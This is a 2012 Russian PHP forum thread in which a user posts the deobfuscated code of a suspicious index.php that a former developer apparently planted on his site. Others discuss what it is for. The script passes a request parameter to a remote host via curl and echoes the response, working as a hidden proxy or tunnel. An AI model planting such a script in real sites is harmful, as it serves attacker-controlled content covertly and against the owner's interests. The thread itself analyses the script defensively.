PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

злоскрипт

Форумы портала PHP.SU » PHP » Программирование на PHP (Модераторы: valenok, OrmaJever, Саныч)

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

LIME	Отправлено: 14 Апреля, 2012 - 02:46:36
Активный участник Покинул форум Сообщений всего: 10732 Дата рег-ции: Нояб. 2010 Помог: 322 раз(а)	кстать надо бы ветку "безопасность" добавить обнаружил на сайте старенький файл index.php там где ему нельзя было быть видимо бывший прогер нехороший вставил хотя была уязвимость (возможно специально) но речь не об этом расшифровал чет каким-то он слишком безобидным туннелем оказался хотя он несложный я вряд-ли мог ошибиться если кому не лень можете расшифровать и может кто знает НАФИГА??? какой профит? если черный сео то там только 1 посторонняя ссылка sergey-mavrodi.com )) исходный прилагаю в атач вот что вышло Спойлер (Отобразить) PHP: скопировать код в буфер обмена <? $id=$_REQUEST['id']; $ch=curl_init(); //if(true\|\| array_splice($ch,$_REQUEST,$var2)); //else{curl_multi_select($_REQUEST,$ch,$addr);} $addr='http://nevermord.ipbux.ru/valero/amm/' .$id; //if(strpos('qeccgjcbeanig','flz')!==false)strrpos($var2,$id); curl_setopt($ch,CURLOPT_URL,$addr); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); //while(4933-4933)is_array($id,$var2); $content=curl_exec($ch); curl_close($ch); //$var4='pv'; if(strstr($id,'.css')){ header('Content-Type: text/css; charset=windows-1251'); }elseif(strstr($id,'.png')){ header('Content-Type: image/png'); }elseif(strstr($id,'.jpg')\|\| strstr($id,'.jpeg')){ header('Content-Type: image/jpeg'); }elseif(strstr($id,'.gif')){ header('Content-Type: image/gif'); }else{ header('Content-Type: text/html; charset=windows-1251'); } echo $content; (Добавление) забыл уточнить по логам к нему ООООчень часто (ежесекундно практически) обращения шли с разных ип значит для чего-то это надо ерунда какая-то Скачать файл: index.php Скачан раз: 58

DlTA	Отправлено: 14 Апреля, 2012 - 09:33:12
Постоянный участник Покинул форум Сообщений всего: 2952 Дата рег-ции: Окт. 2010 Помог: 53 раз(а)	судя по всему это тупо прокся, которой чел пытается юзать, а какой реф у запросов к этой странице?

LIME	Отправлено: 14 Апреля, 2012 - 13:48:04
Активный участник Покинул форум Сообщений всего: 10732 Дата рег-ции: Нояб. 2010 Помог: 322 раз(а)	без рефа я тоже первым делом так подумал но нет смысла юзать как прокси курл берет какуюто старую страницу форума 2005 г явно просто сохраненную на зло серваке...вернее несколько работают ссылки на соседние темы надо только сменить часть адреса(на сайте то я закрыл уже лавочку) смотри $addr это ширма просто все ссылки внутренние кроме верхнего банера еще интересная ссылка на закачку файла но нафига такие сложности если с нее просто редирект в чем же фикус (Добавление) файл был записан в 2008

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Программирование на PHP »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.